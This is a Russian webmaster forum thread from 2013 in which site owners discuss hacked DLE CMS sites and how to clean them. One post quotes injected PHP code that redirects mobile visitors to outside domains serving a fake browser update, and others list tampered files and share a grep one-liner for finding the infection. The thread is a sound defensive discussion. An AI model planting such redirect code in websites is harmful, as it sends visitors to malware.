- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Можно, но это не панацея... Он больше предназначен для защиты файлов сервера, а не файлов конкретного сайта неизвестно какой cms.
Нет, это зависит от того, кому разрешено публиковать новости. Ведь взломы идут через файлы, поддерживающие анимацию, т.е. gif.
Стесняюсь спросить... У вас основное направление сайта - именно WEB, а не для мобильных устройств? Вы когда сайт устанавливали права на файлы мобильного шаблона (включая htaccess шаблона для мобильной версии) тоже выставляли как указано в документации или продинамили за ненадобностью?
Да, веб.
Права все стоят как нужно.
Сегодня опять код этот появился((
Недавно заметил, что залили дор (замаскированный под дизайнерский скрипт) на многие сайты CMS DLE 8.5-9.5 (все заплатки установлены) в папку /language/index.php
Хмм, скрипт оказался и на одном html сайте. Будьте бдительны.
А что мешает купить лицензионную DLE? И будет всё нормально. У вас же сплошные дыры в CMS. У меня все сайты на лицензии и всё нормально.
Без обид.
А что мешает купить лицензионную DLE? И будет всё нормально. У вас же сплошные дыры в CMS. У меня все сайты на лицензии и всё нормально.
Без обид.
Мимо! Лицензию тоже ломают. Просто вам повезло ;)
Блин и меня опять ломанули, но теперь поступили хитро. Код раньше вставляли в main.tpl теперь в index.php, который в корне. Грузилось псевдо обновление браузера.
index.php:
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://live-internet.ws/');
language/Russian/website.lng, engine/engine.php, engine/init.php, engine/data/config.php, engine/data/dbconfig.php:
P.S спасибо Ai-bolit
И это еще не конец :( Остальное пока не могу найти.
Давайте что решать уважаемые АДМИНЫ!!! Сколько это может продолжаться???Нужно принимать кардинальные меры по ликвидации этого паразита!
А что мешает купить лицензионную DLE? И будет всё нормально.
Купил по новогодней акции две лицензии (получил 4). За несколько дней до массовых взломов успел установить на 3 сайта с трафиком. Итог: два из ни в январе взломаны, полтора десятка дохлых сателлитов на нуленых движках - нетронуты. Вот так. :)
Сателлиты на DLE 9.3-9.6. На одном нашёл пользователя "tehApocalypse", но редирект прописан не был.
Сайты ломают там где открыта регистрация.
И снова взлом на сайте где открыта регистрация юзеров.
Результаты базы
Зарегистрировано пользователей: 76086
Всего комментариев: 7894 [ последние комментарии ] [ редактировать комментарии ]
Щас проверю другие сайты у себя.
---------- Добавлено 03.02.2013 в 19:29 ----------
Смотрите движки таким образом.
Сканирование системы антивирусом Дле.
И просматривайте все что менялось 2 февраля.
По изменению вижу что второго покоцали
./engine/engine.php 34,09 Kb 03.02.2013 19:09:34 не соответствует
./engine/data/dbconfig.php 1 Kb 02.02.2013 01:26:59 не соответствует
./engine/init.php 14,21 Kb 03.02.2013 19:07:41 не соответствует
./language/Russian/website.lng 36,09 Kb 02.02.2013 01:26:59 не соответствует
И еще если у вас сателлитыю Удаляйте из базы всех не нужных юзеров.
В настрйках системы ставиет то число юзеров которое у вас там должно быть.
Я ставлю 1 и все норм
---------- Добавлено 03.02.2013 в 20:05 ----------
Я запускаю этот скрипт через команду SSH
find -type f -regex ".*\(.php\|.tpl\|.lng\|.html\)$"|while read i;do cat "$i"|grep -H --label="$i" "\"http://yacounter\|berry \=\=\= true\|statuses\.\|BlackBerry";done > readme.txt
Пробуйте, не исключено что найдете много заразы.
seosniks, Ну я у себя выудил эту заразу. Качнул просто папку www себе на пк. Тотал коммандером нашел все файлы в которых есть слово Iphone ну а там уже удалил код и залил через фтп.
Регистрация у меня открыта, закрыть не могу, людей около 8000 человек, из них 4 админа.
И айболит помог здорово. пытался ним сделать, но он нашел не везде эту заразу.
---------- Добавлено 03.02.2013 в 20:38 ----------
Я запускаю этот скрипт через команду SSH
У меня на хостинге отключен, хотел тоже так сделать. Но сделал по другому :) Так что способ не универсален.
seosniks, Ну я у себя выудил эту заразу. Качнул просто папку www себе на пк. Тотал коммандером нашел все файлы в которых есть слово Iphone ну а там уже удалил код и залил через фтп.
Регистрация у меня открыта, закрыть не могу, людей около 8000 человек, из них 4 админа.
И айболит помог здорово. пытался ним сделать, но он нашел не везде эту заразу.
---------- Добавлено 03.02.2013 в 20:38 ----------
У меня на хостинге отключен, хотел тоже так сделать. Но сделал по другому :) Так что способ не универсален.
Еще можно искать notepad+++ тоже хороший блокнотик.
В принципе можно как и вы, только не качать папку uploads
ато долго качать придется.
Если подгружают заразу через ПМ надо опробовать отключить эту опцию.